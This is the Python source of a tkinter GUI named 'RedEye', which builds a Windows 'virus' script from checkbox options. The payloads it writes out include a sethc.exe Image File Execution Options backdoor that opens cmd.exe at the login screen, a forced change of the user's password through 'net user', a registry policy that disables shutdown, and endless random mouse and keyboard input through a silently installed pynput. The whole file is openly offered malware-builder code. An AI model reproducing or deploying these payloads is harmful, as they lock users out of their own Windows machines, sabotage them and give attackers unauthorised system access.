redeye.py 12 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355
  1. from tkinter import Label
  2. from tkinter import *
  3. from tkinter import messagebox
  4. from tkinter import ttk
  5. from tkinter import scrolledtext
  6. import tkinter
  7. import os
  8. ################################################
  9. # main window
  10. ################################################
  11. fontfam = '-family {Segoe UI} -size 14'
  12. redeye=Tk()
  13. redeye.geometry('400x600')
  14. redeye.resizable(0,0)
  15. redeye.configure(background='#333333')
  16. redeye.title('RedEye ----->ZerOne.Byte')
  17. redeye.iconbitmap('logo.ico')
  18. ################################################
  19. # Part One
  20. ################################################
  21. core = LabelFrame(redeye)
  22. core.place(relx=0.01,rely=0.01,relheight=0.6,relwidth=0.98)
  23. core.configure(text='Capabilities')
  24. core.configure(background='#333333')
  25. core.configure(foreground='#46dd74')
  26. core.configure(font = fontfam)
  27. ################################################
  28. # Part Two
  29. ################################################
  30. make = LabelFrame(redeye)
  31. make.place(relx=0.01,rely=0.62,relheight=0.25,relwidth=0.98)
  32. make.configure(background='#333333')
  33. make.configure(text='Make')
  34. make.configure(font = fontfam)
  35. make.configure(foreground='#46dd74')
  36. list1=["0","0","0","0","0","0","0","0"]
  37. ################################################
  38. # Functions,Part One
  39. ################################################
  40. #------BackDoor
  41. def bk():
  42. if b.get()=='1':
  43. list1[0]='1'
  44. else:
  45. list1[0]='0'
  46. #-----Password Chang
  47. def password():
  48. if passw.get()=="1":
  49. list1[1]='2'
  50. p.place(relx=0.62,rely=0.12)
  51. else:
  52. list1[1]='0'
  53. p.place_forget()
  54. #------ Open Web
  55. def website():
  56. if webs.get()=="1":
  57. list1[2]='3'
  58. w.place(relx=0.52,rely=0.22)
  59. else:
  60. list1[2]='0'
  61. w.place_forget()
  62. #--------Disable
  63. def ch():
  64. if chh.get()=='1':
  65. list1[3]='4'
  66. else:
  67. list1[3]='0'
  68. #------Mouse
  69. def mu():
  70. if mm.get()=='1':
  71. list1[5]='6'
  72. else:
  73. list1[5]='0'
  74. #------KeyBoard
  75. def ke():
  76. if kk.get()=='1':
  77. list1[6]='7'
  78. else:
  79. list1[6]='0'
  80. #------MessageBox
  81. def ms():
  82. if msgv.get()=='1':
  83. list1[4]='5'
  84. msgt.place(relx=0.05,rely=0.75,relheight=0.2,relwidth=0.9)
  85. else:
  86. list1[4]='0'
  87. msgt.place_forget()
  88. ################################################
  89. # Functions,Part Two
  90. ################################################
  91. #---------Start Button
  92. def sta():
  93. a = 0
  94. b = 0
  95. ename= n.get()
  96. passs = pasword.get()
  97. wweb = weeb.get()
  98. mmtt = mmt.get()
  99. status.delete("1.0","end")
  100. status.insert(INSERT,'Status\n------------\n')
  101. if ename=='':
  102. status.insert(INSERT,'Error: Name \n')
  103. b=1
  104. if list1[1] == '2':
  105. if passs == "":
  106. status.insert(INSERT,"Error: Pass\n")
  107. b=1
  108. if list1[2] == '3':
  109. if wweb == "":
  110. status.insert(INSERT,"Error: Web\n")
  111. b=1
  112. if list1[4] == '5':
  113. if mmtt == '':
  114. status.insert(INSERT,"Error: Message\n")
  115. b=1
  116. if b == 0:
  117. if ename != '':
  118. try:
  119. fileout = open(f'Out\{ename}.txt','w')
  120. except FileExistsError:
  121. status.insert(INSERT,"Error: File \nExists\n")
  122. m = 'import os\nimport getpass\nimport winreg\nfrom tkinter import messagebox\nfrom tkinter import *\nimport tkinter\nimport random\n'
  123. nn = '''
  124. try:
  125. import pynput
  126. except:
  127. os.system('pip install pynput')
  128. import pynput
  129. '''
  130. fileout.write(m)
  131. fileout.write(nn)
  132. for check in list1:
  133. if check == "1":
  134. code = """code = '''REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe ''' """
  135. cmd = 'os.system(code)'
  136. fileout.write(code+'\n')
  137. fileout.write(cmd+'\n')
  138. status.insert(INSERT,'OK: BackDoor\n')
  139. if check == "2":
  140. u = 'User = getpass.getuser()'
  141. p= f"password = '{passs}'"
  142. o = "os.system(f'net user {User} {password}')"
  143. fileout.write(u+'\n')
  144. fileout.write(p+'\n')
  145. fileout.write(o+'\n')
  146. status.insert(INSERT,'OK: Pass\n')
  147. if check == "3":
  148. open_web= f'os.system("start {wweb}")'
  149. fileout.write(open_web+'\n')
  150. status.insert(INSERT,'OK: Web\n')
  151. if check == "4":
  152. wi="winreg.CreateKey(winreg.HKEY_CURRENT_USER,r'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer')"
  153. ky="key = winreg.ConnectRegistry(None,winreg.HKEY_CURRENT_USER)"
  154. su="sub = winreg.OpenKey(key,r'Software\Microsoft\Windows\CurrentVersion\Policies\Explorer',0,winreg.KEY_WRITE)"
  155. wii="winreg.SetValueEx(sub,'NoClose',0,winreg.REG_DWORD,1)"
  156. fileout.write(wi+'\n')
  157. fileout.write(ky+'\n')
  158. fileout.write(su+'\n')
  159. fileout.write(wii+'\n')
  160. status.insert(INSERT,'OK: Shut\n')
  161. if check == "5":
  162. tt="t=Tk()"
  163. ttt="t.geometry('0x0')"
  164. tttt="t.resizable(0,0)"
  165. ttttt=f"messagebox.showerror('Error','{mmtt}')"
  166. fileout.write(tt+'\n')
  167. fileout.write(ttt+'\n')
  168. fileout.write(tttt+'\n')
  169. fileout.write(ttttt+'\n')
  170. status.insert(INSERT,'OK: MSG\n')
  171. if check=="6":
  172. ww = "while True:"
  173. a=1
  174. mos="mos = pynput.mouse.Controller()"
  175. kb="kb = pynput.keyboard.Controller()"
  176. lx = " a = random.randint(0,1000)"
  177. ly=" b = random.randint(0,1000)"
  178. run = " mos.position = (a , b)"
  179. fileout.write(mos+'\n')
  180. fileout.write(kb+'\n')
  181. fileout.write(ww+'\n')
  182. fileout.write(lx+'\n')
  183. fileout.write(ly+'\n')
  184. fileout.write(run+'\n')
  185. status.insert(INSERT,'OK: Mous\n')
  186. if check=="7":
  187. if a == 0:
  188. kb=" kb = pynput.keyboard.Controller()"
  189. ww = "while True:"
  190. fileout.write(kb+'\n')
  191. fileout.write(ww+'\n')
  192. bb = " kb.press('h')"
  193. bbb=" kb.press('a') "
  194. fileout.write(bb+'\n')
  195. fileout.write(bbb+'\n')
  196. status.insert(INSERT,'OK: Keyboard\n')
  197. fileout.close()
  198. status.insert(INSERT,'************\n')
  199. status.insert(INSERT,'OK: DONE\n')
  200. myfile = f'Out\{ename}.txt'
  201. base = os.path.splitext(myfile)[0]
  202. try:
  203. os.rename(myfile, base + '.py')
  204. messagebox.showinfo('Finish','Done file creation process')
  205. except FileExistsError:
  206. os.remove(myfile)
  207. status.delete("1.0","end")
  208. status.insert(INSERT,'Status\n------------\n')
  209. status.insert(INSERT,"Error: File \nExists\n")
  210. messagebox.showwarning('Warning','There is a file with the same names')
  211. #---------Clear Button
  212. def cl():
  213. nam.delete(0,END)
  214. p.delete(0,END)
  215. w.delete(0,END)
  216. msgt.delete(0,"end")
  217. status.delete("1.0","end")
  218. status.insert(INSERT,'Status\n------------\n')
  219. #------Contact Button
  220. def contact():
  221. os.system("start https://github.com/ZerOne-Byte")
  222. os.system("start https://t.me/ZerOneByte")
  223. os.system("start https://www.instagram.com/zerone.byte/")
  224. ################################################
  225. # objects,Part One
  226. ################################################
  227. #---------BackDoor
  228. b = StringVar(redeye)
  229. b.set(0)
  230. back = Checkbutton(core,variable=b,command=bk, text = 'Mack A Simple BackDoor',fg='red',bg='#333333',font = '-family {Segoe UI} -size 15',activebackground='#333333')
  231. back.place(relx=0.05,rely=0.00,relheight=0.1,relwidth=0.63)
  232. #--------Password
  233. passw =StringVar(redeye)
  234. passw.set(0)
  235. pas = Checkbutton(core,variable =passw,text = 'Change Password To :',fg='red',bg='#333333',font = '-family {Segoe UI} -size 15',activebackground='#333333',command = password)
  236. pas.place(relx=0.05,rely=0.10,relheight=0.1,relwidth=0.55)
  237. pasword=StringVar()
  238. p= Entry(core,textvariable=pasword,width=12,font = '-family {Segoe UI} -size 11',background='#333333',fg='#ffffff')
  239. #--------Open Web
  240. webs = StringVar(redeye)
  241. webs.set(0)
  242. web = Checkbutton(core,variable =webs,text = 'Open Web Page :',fg='red',bg='#333333',font = '-family {Segoe UI} -size 15',activebackground='#333333',command = website)
  243. web.place(relx=0.05,rely=0.20,relheight=0.1,relwidth=0.45)
  244. weeb= StringVar()
  245. w= Entry(core,textvariable=weeb,width=20,font = '-family {Segoe UI} -size 11',background='#333333',fg='#ffffff')
  246. #-------Disable
  247. chh = StringVar(redeye)
  248. chh.set(0)
  249. click = Checkbutton(core,variable=chh,command=ch,text = 'Disable Shutdown,Sleep,Restart',fg='red',bg='#333333',font = '-family {Segoe UI} -size 15',activebackground='#333333')
  250. click.place(relx=0.05,rely=0.30,relheight=0.1,relwidth=0.77)
  251. #------Mouse
  252. mm = StringVar(redeye)
  253. mm.set(0)
  254. Mous = Checkbutton(core,variable=mm,command=mu, text = 'Crazy Mous',fg='red',bg='#333333',font = '-family {Segoe UI} -size 15',activebackground='#333333')
  255. Mous.place(relx=0.05,rely=0.40,relheight=0.1,relwidth=0.32)
  256. #------KeyBoard
  257. kk = StringVar(redeye)
  258. kk.set(0)
  259. key = Checkbutton(core,variable=kk,command=ke, text = 'Crazy keyboard',fg='red',bg='#333333',font = '-family {Segoe UI} -size 15',activebackground='#333333')
  260. key.place(relx=0.05,rely=0.50,relheight=0.1,relwidth=0.41)
  261. #------MessageBox
  262. msgv = StringVar(redeye)
  263. msgv.set(0)
  264. msg = Checkbutton(core,variable =msgv,text = 'Show MessageBox ',fg='red',bg='#333333',font = '-family {Segoe UI} -size 15',activebackground='#333333',command = ms)
  265. msg.place(relx=0.05,rely=0.60,relheight=0.1,relwidth=0.48)
  266. #t = StringVar()
  267. mmt= StringVar()
  268. msgt=Entry(core,textvariable=mmt,fg='red',bg='#333333',font = '-family {Segoe UI} -size 12')
  269. ################################################
  270. # objects,Part Two
  271. ################################################
  272. #------Name For Virus
  273. name =Label(make,text = 'Name For Virus: ',fg='red',bg='#333333',font = '-family {Segoe UI} -size 12')
  274. name.place(relx=0.01,rely=0.0,relheight=0.2,relwidth=0.3)
  275. n=StringVar()
  276. nam= Entry(make,textvariable=n,width=10,background='#333333',fg='#ffffff',font = '-family {Segoe UI} -size 11')
  277. nam.place(relx=0.32,rely=0.0,relheight=0.2,relwidth=0.3)
  278. #-----Statuse
  279. status=scrolledtext.ScrolledText(make,bg='#333333',fg='red',font = '-family {Segoe UI} -size 12')
  280. status.place(relx=0.65,rely=0.0,relheight=0.9,relwidth=0.32)
  281. status.insert(INSERT,'Status\n------------\n')
  282. #------Start
  283. start=Button(make,command=sta,text='Start Making...',bg='#333333',fg='red',font = '-family {Segoe UI} -size 12',activebackground='#0aff55')
  284. start.place(relx=0.03,rely=0.3,relheight=0.25,relwidth=0.30)
  285. #----- Clear
  286. clear=Button(make,text='Clear',bg='#333333',fg='red',font = '-family {Segoe UI} -size 12',activebackground='#0aff55',command =cl)
  287. clear.place(relx=0.4,rely=0.3,relheight=0.25,relwidth=0.18)
  288. #------Contact
  289. contact=Button(make,text='Contact With Me',bg='#333333',fg='red',font = '-family {Segoe UI} -size 12',activebackground='#0aff55',command = contact)
  290. contact.place(relx=0.16,rely=0.65,relheight=0.25,relwidth=0.35)
  291. ################################################
  292. # objects,END
  293. ################################################
  294. #---------CopyRight
  295. copy= Label(redeye,text='CopyRight: ZerOne.Byte',fg='#0aff55',bg='#333333',font='-family {Segoe UI} -size 10')
  296. copy.place(relx=0.30,rely=0.88)
  297. #---------Telegram
  298. me = Label(redeye,text='Telegram: @ZerOneByte - Instagram: @ZerOne.Byte - Github: @ZerOne-Byte',fg='#0aff55',bg='#333333',font='-family {Segoe UI} -size 8')
  299. me.place(relx=0.0,rely=0.95)
  300. redeye.mainloop()